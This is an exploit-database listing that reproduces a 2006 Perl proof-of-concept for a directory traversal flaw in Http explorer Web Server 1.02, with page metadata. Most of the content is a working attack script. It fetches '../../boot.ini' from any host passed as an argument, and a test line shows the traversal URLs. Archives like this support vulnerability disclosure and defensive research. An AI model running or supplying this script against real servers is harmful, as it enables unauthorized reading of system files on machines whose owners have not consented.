Lucene search

K
exploitdbStr0keEDB-ID:2974
HistoryDec 21, 2006 - 12:00 a.m.

Http explorer Web Server 1.02 - Directory Traversal

2006-12-2100:00:00
str0ke
www.exploit-db.com
19

AI Score

7.4

Confidence

Low

# Http explorer Web Server 1.02 Directory Transversal Vulnerability
# http://sourceforge.net/projects/http-explorer/
# Test:  http://[site]/../../../../ || http://[site]/../
# /str0ke

use LWP::Simple;
use strict;

sub usage
{
    print "Http explorer Web Server 1.02 Directory Transversal Vulnerability\n";
    print "str0ke (milw0rm.com)\n";
    print "Usage: $0 www.example.com\n";
    exit ();
}

my $host= shift || &usage;

getprint "http://" . $host . "/../../../../../../../../boot.ini";

# milw0rm.com [2006-12-21]

AI Score

7.4

Confidence

Low

Related for EDB-ID:2974